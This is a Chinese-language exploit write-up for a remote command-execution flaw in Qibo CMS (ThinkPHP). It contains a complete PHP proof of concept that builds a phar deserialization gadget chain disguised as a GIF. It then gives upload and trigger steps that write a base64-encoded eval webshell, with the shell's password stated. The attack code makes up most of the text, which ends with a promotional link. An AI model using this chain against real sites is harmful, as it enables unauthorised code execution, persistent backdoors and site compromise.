[齐博CMS系统存在命令执行漏洞]
漏洞利用过程:
1 首先爆出网站跟路径:
访问:
/index.php/cms/1
会在debug里看到网站根路径! 如果开了debug的话!
然后根据网站根路径修改poc! 看poc里的注释!
2 利用poc生成 phar文件
poc
[齐博CMS系统存在命令执行漏洞]
漏洞利用过程:
1 首先爆出网站跟路径:
访问:
/index.php/cms/1
会在debug里看到网站根路径! 如果开了debug的话!
然后根据网站根路径修改poc! 看poc里的注释!
2 利用poc生成 phar文件
poc
<?php
namespace think\process\pipes {
class Windows {
private $files = [];
public function __construct ( $files )
{
$this-> files = [ $files ]; //$file => /think/Model的子类new Pivot(); Model是抽象类
}
}
}
namespace think {
abstract class Model {
protected $append = [];
protected $error = null ;
public $parent ;
function __construct ( $output , $modelRelation )
{
$this-> parent = $output ; //$this->parent=> think\console\Output;
$this-> append = array ( "xxx"=> "getError" ); //调用getError 返回this->error
$this-> error = $modelRelation ; // $this->error 要为 relation类的子类,并且也是OnetoOne类的子类==>>HasOne
}
}
}
namespace think\model {
use think\Model ;
class Pivot extends Model {
function __construct ( $output , $modelRelation )
{
parent :: __construct ( $output , $modelRelation );
}
}
}
namespace think\model\relation {
class HasOne extends OneToOne {
}
}
namespace think\model\relation {
abstract class OneToOne
{
protected $selfRelation ;
protected $bindAttr = [];
protected $query ;
function __construct ( $query )
{
$this-> selfRelation = 0 ;
$this-> query = $query ; //$query指向Query
$this-> bindAttr = [ 'xxx' ]; // $value值,作为call函数引用的第二变量
}
}
}
namespace think\db {
class Query {
protected $model ;
function __construct ( $model )
{
$this-> model = $model ; //$this->model=> think\console\Output;
}
}
}
namespace think\console {
class Output {
private $handle ;
protected $styles ;
function __construct ( $handle )
{
$this-> styles = [ 'getAttr' ];
$this-> handle =$handle ; //$handle->think\session\driver\Memcached
}
}
}
namespace think\session\driver {
class Memcached
{
protected $handler ;
function __construct ( $handle )
{
$this-> handler = $handle ; //$handle->think\cache\driver\File
}
}
}
namespace think\cache\driver {
class File
{
protected $options= null ;
protected $tag ;
function __construct (){
$this-> options= [
'expire' => 3600 ,
'cache_subdir' => false ,
'prefix' => '' ,
//'path' => '1111.php',
'path' => 'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWyd1cGxvYWQnXSk7ZWNobygidXBsb2FkIik7Pz4/../../../../../../../../../../../phpstudy_pro/WWW/aaa/x1/public/b.php' , //win
/*/phpstudy_pro/WWW/aaa/x1/public/b.php /phpstudy_pro/WWW/aaa/x1/是网站根路径,要根据不同服务器进行替换! /public/b.php是webshell的位置 */
'data_compress' => false ,
];
$this-> tag = 'xxx' ;
}
}
}
namespace {
$Memcached = new think\session\driver\Memcached ( new \think\cache\driver\File ());
$Output = new think\console\Output ( $Memcached );
$model = new think\db\Query ( $Output );
$HasOne = new think\model\relation\HasOne ( $model );
$window = new think\process\pipes\Windows ( new think\model\Pivot ( $Output , $HasOne ));
// echo urlencode(serialize($window));
$o = $window ;
$filename = '2.phar' ; // 后缀必须为phar,否则程序无法运行
file_exists ( $filename ) ? unlink ( $filename ) : null ;
$phar= new Phar ( $filename );
$phar-> startBuffering ();
$phar-> setStub ( "GIF89a<?php __HALT_COMPILER(); ?>" );
$phar-> setMetadata ( $o );
$phar-> addFromString ( "foo.txt" , "bar" );
$phar-> stopBuffering ();
}
3 生成phar文件 将后缀改成gif!
访问 会员中心:
点击修改个人资料:
用burp抓取 文件上传路径:
4 再访问下面url写入webshell:
/index.php/index/Image/headers?url=phar://./public/uploads/pop/20210915/2_20210915195309ac45c.gif
后面是刚刚上传的gif文件!
访问完成后,即可在网站目录下生成webshell.
5 访问webshell
/public/b.php12ac95f1498ce51d2d96a249c09c1998.php
shell写入成功! 密码是upload
总结
一直挖洞一直爽!
点击获取【网络安全学习资料·攻略】一起挖洞一起爽吧!!!
